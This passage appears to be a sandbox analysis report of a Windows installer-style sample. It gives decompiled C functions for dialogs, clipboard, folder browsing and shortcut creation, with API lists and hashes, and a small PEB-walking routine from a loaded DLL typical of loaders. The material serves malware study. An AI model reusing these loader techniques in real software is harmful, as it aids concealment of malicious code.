                              							if(_a16 == 0xffffffff) {
                              								GetWindowRect(_v8,  &_v24);
                              								_t95 = _v24.left;
                              								_t153 = _v24.top;
                              							}
                              							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                              							__eflags = _t96 - 1;
                              							if(_t96 == 1) {
                              								_t165 = 1;
                              								__eflags = 1;
                              								_v56 = _t150;
                              								_v44 = 0x420d50;
                              								_v40 = 0x1000;
                              								_a4 = _a12;
                              								do {
                              									_a4 = _a4 - 1;
                              									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                              									__eflags = _a4 - _t150;
                              									_t165 = _t165 + _t99 + 2;
                              								} while (_a4 != _t150);
                              								OpenClipboard(_t150);
                              								EmptyClipboard();
                              								_t102 = GlobalAlloc(0x42, _t165);
                              								_a4 = _t102;
                              								_t166 = GlobalLock(_t102);
                              								do {
                              									_v44 = _t166;
                              									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                              									 *_t167 = 0xd;
                              									_t168 = _t167 + 1;
                              									 *_t168 = 0xa;
                              									_t166 = _t168 + 1;
                              									_t150 = _t150 + 1;
                              									__eflags = _t150 - _a12;
                              								} while (_t150 < _a12);
                              								GlobalUnlock(_a4);
                              								SetClipboardData(1, _a4);
                              								CloseClipboard();
                              							}
                              							goto L36;
                              						}
                              						__eflags =  *0x423f0c - _t150; // 0x0
                              						if(__eflags == 0) {
                              							ShowWindow( *0x424748, 8);
                              							__eflags =  *0x4247ec - _t150;
                              							if( *0x4247ec == _t150) {
                              								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
                              							}
                              							E00404285(1);
                              							goto L25;
                              						}
                              						 *0x420120 = 2;
                              						E00404285(0x78);
                              						goto L20;
                              					} else {
                              						__eflags = _a12 - 0x403;
                              						if(_a12 != 0x403) {
                              							L20:
                              							return E00404313(_t157, _a12, _a16);
                              						}
                              						ShowWindow( *0x423f10, _t150);
                              						ShowWindow(_v8, 8);
                              						E004042E1(_v8);
                              						goto L17;
                              					}
                              				}
                              				_v48 = _v48 | 0xffffffff;
                              				_v36 = _v36 | 0xffffffff;
                              				_t169 = 2;
                              				_v56 = _t169;
                              				_v52 = 0;
                              				_v44 = 0;
                              				_v40 = 0;
                              				asm("stosd");
                              				asm("stosd");
                              				_t124 =  *0x424754;
                              				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                              				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                              				 *0x423f10 = GetDlgItem(_a4, 0x403);
                              				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
                              				_t128 = GetDlgItem(_a4, 0x3f8);
                              				 *0x423f24 = _t128;
                              				_v8 = _t128;
                              				E004042E1( *0x423f10);
                              				 *0x423f14 = E00404BD2(4);
                              				 *0x423f2c = 0;
                              				GetClientRect(_v8,  &_v24);
                              				_v48 = _v24.right - GetSystemMetrics(_t169);
                              				SendMessageA(_v8, 0x101b, 0,  &_v56);
                              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                              				if(_a12 >= 0) {
                              					SendMessageA(_v8, 0x1001, 0, _a12);
                              					SendMessageA(_v8, 0x1026, 0, _a12);
                              				}
                              				if(_a8 >= _t150) {
                              					SendMessageA(_v8, 0x1024, _t150, _a8);
                              				}
                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                              				_push(0x1b);
                              				E004042AC(_a4);
                              				if(( *0x42475c & 0x00000003) != 0) {
                              					ShowWindow( *0x423f10, _t150);
                              					if(( *0x42475c & 0x00000002) != 0) {
                              						 *0x423f10 = _t150;
                              					} else {
                              						ShowWindow(_v8, 8);
                              					}
                              					E004042E1( *0x423f08);
                              				}
                              				_t161 = GetDlgItem(_a4, 0x3ec);
                              				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                              				if(( *0x42475c & 0x00000004) != 0) {
                              					SendMessageA(_t161, 0x409, _t150, _a8);
                              					SendMessageA(_t161, 0x2001, _t150, _a12);
                              				}
                              				goto L36;
                              			}

                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 004054EC
                              • GetDlgItem.USER32(?,000003EE), ref: 004054FB
                              • GetClientRect.USER32 ref: 00405538
                              • GetSystemMetrics.USER32 ref: 0040553F
                              • SendMessageA.USER32 ref: 00405560
                              • SendMessageA.USER32 ref: 00405571
                              • SendMessageA.USER32 ref: 00405584
                              • SendMessageA.USER32 ref: 00405592
                              • SendMessageA.USER32 ref: 004055A5
                              • ShowWindow.USER32(00000000,?), ref: 004055C7
                              • ShowWindow.USER32(?,00000008), ref: 004055DB
                              • GetDlgItem.USER32(?,000003EC), ref: 004055FC
                              • SendMessageA.USER32 ref: 0040560C
                              • SendMessageA.USER32 ref: 00405625
                              • SendMessageA.USER32 ref: 00405631
                              • GetDlgItem.USER32(?,000003F8), ref: 0040550A
                                • Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF
                              • GetDlgItem.USER32(?,000003EC), ref: 0040564D
                              • CreateThread.KERNEL32(00000000,00000000,Function_00005421,00000000), ref: 0040565B
                              • CloseHandle.KERNEL32(00000000), ref: 00405662
                              • ShowWindow.USER32(00000000), ref: 00405685
                              • ShowWindow.USER32(?,00000008), ref: 0040568C
                              • ShowWindow.USER32(00000008), ref: 004056D2
                              • SendMessageA.USER32 ref: 00405706
                              • CreatePopupMenu.USER32 ref: 00405717
                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040572C
                              • GetWindowRect.USER32 ref: 0040574C
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
                              • SendMessageA.USER32 ref: 004057A1
                              • OpenClipboard.USER32(00000000), ref: 004057B1
                              • EmptyClipboard.USER32 ref: 004057B7
                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
                              • GlobalLock.KERNEL32 ref: 004057CA
                              • SendMessageA.USER32 ref: 004057DE
                              • GlobalUnlock.KERNEL32(00000000), ref: 004057F7
                              • SetClipboardData.USER32 ref: 00405802
                              • CloseClipboard.USER32 ref: 00405808
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                              • String ID: PB
                              • API String ID: 590372296-3196168531
                              • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                              • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                              • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                              • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                              				signed int _v8;
                              				signed int _v12;
                              				long _v16;
                              				long _v20;
                              				long _v24;
                              				char _v28;
                              				intOrPtr _v32;
                              				long _v36;
                              				char _v40;
                              				unsigned int _v44;
                              				signed int _v48;
                              				CHAR* _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				intOrPtr _v68;
                              				CHAR* _v72;
                              				void _v76;
                              				struct HWND__* _v80;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t82;
                              				long _t87;
                              				signed char* _t89;
                              				void* _t95;
                              				signed int _t96;
                              				int _t109;
                              				signed char _t114;
                              				signed int _t118;
                              				struct HWND__** _t122;
                              				intOrPtr* _t138;
                              				CHAR* _t146;
                              				intOrPtr _t147;
                              				unsigned int _t150;
                              				signed int _t152;
                              				unsigned int _t156;
                              				signed int _t158;
                              				signed int* _t159;
                              				signed char* _t160;
                              				struct HWND__* _t165;
                              				struct HWND__* _t166;
                              				int _t168;
                              				unsigned int _t197;
                              
                              				_t156 = __edx;
                              				_t82 =  *0x420528;
                              				_v32 = _t82;
                              				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
                              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                              				if(_a8 == 0x40b) {
                              					E00405928(0x3fb, _t146);
                              					E00406503(_t146);
                              				}
                              				_t166 = _a4;
                              				if(_a8 != 0x110) {
                              					L8:
                              					if(_a8 != 0x111) {
                              						L20:
                              						if(_a8 == 0x40f) {
                              							L22:
                              							_v8 = _v8 & 0x00000000;
                              							_v12 = _v12 & 0x00000000;
                              							E00405928(0x3fb, _t146);
                              							if(E00405CAE(_t185, _t146) == 0) {
                              								_v8 = 1;
                              							}
                              							E00406228(0x41fd20, _t146);
                              							_t87 = E00406631(1);
                              							_v16 = _t87;
                              							if(_t87 == 0) {
                              								L30:
                              								E00406228(0x41fd20, _t146);
                              								_t89 = E00405C59(0x41fd20);
                              								_t158 = 0;
                              								if(_t89 != 0) {
                              									 *_t89 =  *_t89 & 0x00000000;
                              								}
                              								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                              									goto L35;
                              								} else {
                              									_t168 = 0x400;
                              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                              									asm("cdq");
                              									_v48 = _t109;
                              									_v44 = _t156;
                              									_v12 = 1;
                              									goto L36;
                              								}
                              							} else {
                              								_t159 = 0;
                              								if(0 == 0x41fd20) {
                              									goto L30;
                              								} else {
                              									goto L26;
                              								}
                              								while(1) {
                              									L26:
                              									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
                              									if(_t114 != 0) {
                              										break;
                              									}
                              									if(_t159 != 0) {
                              										 *_t159 =  *_t159 & _t114;
                              									}
                              									_t160 = E00405C07(0x41fd20);
                              									 *_t160 =  *_t160 & 0x00000000;
                              									_t159 = _t160 - 1;
                              									 *_t159 = 0x5c;
                              									if(_t159 != 0x41fd20) {
                              										continue;
                              									} else {
                              										goto L30;
                              									}
                              								}
                              								_t150 = _v44;
                              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                              								_v44 = _t150 >> 0xa;
                              								_v12 = 1;
                              								_t158 = 0;
                              								__eflags = 0;
                              								L35:
                              								_t168 = 0x400;
                              								L36:
                              								_t95 = E00404BD2(5);
                              								if(_v12 != _t158) {
                              									_t197 = _v44;
                              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                              										_v8 = 2;
                              									}
                              								}
                              								_t147 =  *0x423f1c; // 0x5f57f6
                              								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                              									E00404BBA(0x3ff, 0xfffffffb, _t95);
                              									if(_v12 == _t158) {
                              										SetDlgItemTextA(_a4, _t168, 0x41fd10);
                              									} else {
                              										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
                              									}
                              								}
                              								_t96 = _v8;
                              								 *0x424804 = _t96;
                              								if(_t96 == _t158) {
                              									_v8 = E0040140B(7);
                              								}
                              								if(( *(_v32 + 0x14) & _t168) != 0) {
                              									_v8 = _t158;
                              								}
                              								E004042CE(0 | _v8 == _t158);
                              								if(_v8 == _t158 &&  *0x420d40 == _t158) {
                              									E00404697();
                              								}
                              								 *0x420d40 = _t158;
                              								goto L53;
                              							}
                              						}
                              						_t185 = _a8 - 0x405;
                              						if(_a8 != 0x405) {
                              							goto L53;
                              						}
                              						goto L22;
                              					}
                              					_t118 = _a12 & 0x0000ffff;
                              					if(_t118 != 0x3fb) {
                              						L12:
                              						if(_t118 == 0x3e9) {
                              							_t152 = 7;
                              							memset( &_v76, 0, _t152 << 2);
                              							_v80 = _t166;
                              							_v72 = 0x420d50;
                              							_v60 = E00404A8F;
                              							_v56 = _t146;
                              							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
                              							_t122 =  &_v80;
                              							_v64 = 0x41;
                              							__imp__SHBrowseForFolderA(_t122);
                              							if(_t122 == 0) {
                              								_a8 = 0x40f;
                              							} else {
                              								__imp__CoTaskMemFree(_t122);
                              								E00405BC0(_t146);
                              								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
                              								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                              									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
                              									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
                              										lstrcatA(_t146, 0x4236e0);
                              									}
                              								}
                              								 *0x420d40 =  *0x420d40 + 1;
                              								SetDlgItemTextA(_t166, 0x3fb, _t146);
                              							}
                              						}
                              						goto L20;
                              					}
                              					if(_a12 >> 0x10 != 0x300) {
                              						goto L53;
                              					}
                              					_a8 = 0x40f;
                              					goto L12;
                              				} else {
                              					_t165 = GetDlgItem(_t166, 0x3fb);
                              					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
                              						E00405BC0(_t146);
                              					}
                              					 *0x423f18 = _t166;
                              					SetWindowTextA(_t165, _t146);
                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                              					_push(1);
                              					E004042AC(_t166);
                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                              					_push(0x14);
                              					E004042AC(_t166);
                              					E004042E1(_t165);
                              					_t138 = E00406631(8);
                              					if(_t138 == 0) {
                              						L53:
                              						return E00404313(_a8, _a12, _a16);
                              					} else {
                              						 *_t138(_t165, 1);
                              						goto L8;
                              					}
                              				}
                              			}

                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 0040478D
                              • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                              • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                              • CoTaskMemFree.OLE32(00000000), ref: 00404873
                              • lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
                              • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048C3
                                • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040655B
                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 00406568
                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040656D
                                • Part of subcall function 00406503: CharPrevA.USER32(?,?), ref: 0040657D
                              • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                              • MulDiv.KERNEL32 ref: 0040499C
                                • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                • Part of subcall function 00404AF5: SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
                              • API String ID: 2624150263-1753744704
                              • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                              • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                              • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                              • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E0040216B(void* __eflags) {
                              				signed int _t55;
                              				void* _t59;
                              				intOrPtr* _t63;
                              				intOrPtr _t64;
                              				intOrPtr* _t65;
                              				intOrPtr* _t67;
                              				intOrPtr* _t69;
                              				intOrPtr* _t71;
                              				intOrPtr* _t73;
                              				intOrPtr* _t75;
                              				intOrPtr* _t78;
                              				intOrPtr* _t80;
                              				intOrPtr* _t82;
                              				intOrPtr* _t84;
                              				int _t87;
                              				intOrPtr* _t95;
                              				signed int _t105;
                              				signed int _t109;
                              				void* _t111;
                              
                              				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                              				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                              				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                              				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                              				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                              				_t55 =  *(_t111 - 0x18);
                              				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                              				_t105 = _t55 & 0x00008000;
                              				_t109 = _t55 >> 0x0000000c & 0x00000007;
                              				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                              				if(E00405C2D( *(_t111 - 0xc)) == 0) {
                              					E00402BCE(0x21);
                              				}
                              				_t59 = _t111 + 8;
                              				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
                              				if(_t59 < _t87) {
                              					L15:
                              					 *((intOrPtr*)(_t111 - 4)) = 1;
                              					_push(0xfffffff0);
                              				} else {
                              					_t63 =  *((intOrPtr*)(_t111 + 8));
                              					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
                              					 *((intOrPtr*)(_t111 - 8)) = _t64;
                              					if(_t64 >= _t87) {
                              						_t67 =  *((intOrPtr*)(_t111 + 8));
                              						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
                              						if(_t105 == _t87) {
                              							_t84 =  *((intOrPtr*)(_t111 + 8));
                              							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp");
                              						}
                              						if(_t109 != _t87) {
                              							_t82 =  *((intOrPtr*)(_t111 + 8));
                              							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
                              						}
                              						_t69 =  *((intOrPtr*)(_t111 + 8));
                              						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
                              						_t95 =  *((intOrPtr*)(_t111 - 0x34));
                              						if( *_t95 != _t87) {
                              							_t80 =  *((intOrPtr*)(_t111 + 8));
                              							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
                              						}
                              						_t71 =  *((intOrPtr*)(_t111 + 8));
                              						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
                              						_t73 =  *((intOrPtr*)(_t111 + 8));
                              						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
                              						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                              							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
                              							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
                              								_t78 =  *((intOrPtr*)(_t111 - 0x30));
                              								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
                              							}
                              						}
                              						_t75 =  *((intOrPtr*)(_t111 - 0x30));
                              						 *((intOrPtr*)( *_t75 + 8))(_t75);
                              					}
                              					_t65 =  *((intOrPtr*)(_t111 + 8));
                              					 *((intOrPtr*)( *_t65 + 8))(_t65);
                              					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
                              						_push(0xfffffff4);
                              					} else {
                              						goto L15;
                              					}
                              				}
                              				E00401423();
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
                              				return 0;
                              			}

                              APIs
                              • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?), ref: 004021F0
                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                              Strings
                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID: C:\Users\user\AppData\Local\Temp
                              • API String ID: 123533781-2935972921
                              • Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                              • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                              • Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                              • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 39%
                              			E004027A1(char __ebx, char* __edi, char* __esi) {
                              				void* _t19;
                              
                              				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
                              					E00406186(__edi, _t6);
                              					_push(_t19 - 0x1a4);
                              					_push(__esi);
                              					E00406228();
                              				} else {
                              					 *__edi = __ebx;
                              					 *__esi = __ebx;
                              					 *((intOrPtr*)(_t19 - 4)) = 1;
                              				}
                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
                              				return 0;
                              			}





                              APIs
                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                              • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                              • Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                              • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                              • Instruction ID: d241e4ad9633b26e50407d4c214ac206337efd47f83b2df48827af6663fe603d
                              • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                              • Instruction Fuzzy Hash: AA010C79A11248EFCB91DF99D58099DBBF4EB08320B118596E855E7711E330AE50DB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E10001000() {
                              
                              				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                              			}




                              Memory Dump Source
                              • Source File: 00000004.00000002.2163547953.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000004.00000002.2163531689.0000000010000000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2163592483.0000000010002000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2163618148.0000000010004000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                              • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                              • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                              • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                              				struct HWND__* _v8;
                              				struct HWND__* _v12;
                              				long _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				intOrPtr _v28;
                              				signed char* _v32;
                              				int _v36;
                              				signed int _v44;
                              				int _v48;
                              				signed int* _v60;
                              				signed char* _v64;
                              				signed int _v68;
                              				long _v72;
                              				void* _v76;
                              				intOrPtr _v80;
                              				intOrPtr _v84;
                              				void* _v88;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t203;
                              				intOrPtr _t206;
                              				intOrPtr _t207;
                              				long _t212;
                              				signed int _t216;
                              				signed int _t227;
                              				void* _t230;
                              				void* _t231;
                              				int _t237;
                              				long _t242;
                              				long _t243;
                              				signed int _t244;
                              				signed int _t250;
                              				signed int _t252;
                              				signed char _t253;
                              				signed char _t259;
                              				void* _t264;
                              				void* _t266;
                              				signed char* _t284;
                              				signed char _t285;
                              				long _t290;
                              				signed int _t300;
                              				signed int _t308;
                              				signed char* _t316;
                              				int _t320;
                              				int _t321;
                              				signed int* _t322;
                              				int _t323;
                              				long _t324;
                              				signed int _t325;
                              				long _t327;
                              				int _t328;
                              				signed int _t329;
                              				void* _t331;
                              
                              				_v12 = GetDlgItem(_a4, 0x3f9);
                              				_v8 = GetDlgItem(_a4, 0x408);
                              				_t331 = SendMessageA;
                              				_v24 =  *0x424788;
                              				_v28 =  *0x424754 + 0x94;
                              				_t320 = 0x10;
                              				if(_a8 != 0x110) {
                              					L23:
                              					if(_a8 != 0x405) {
                              						_t298 = _a16;
                              					} else {
                              						_a12 = 0;
                              						_t298 = 1;
                              						_a8 = 0x40f;
                              						_a16 = 1;
                              					}
                              					if(_a8 == 0x4e || _a8 == 0x413) {
                              						_v16 = _t298;
                              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                              							if(( *0x42475d & 0x00000002) != 0) {
                              								L41:
                              								if(_v16 != 0) {
                              									_t242 = _v16;
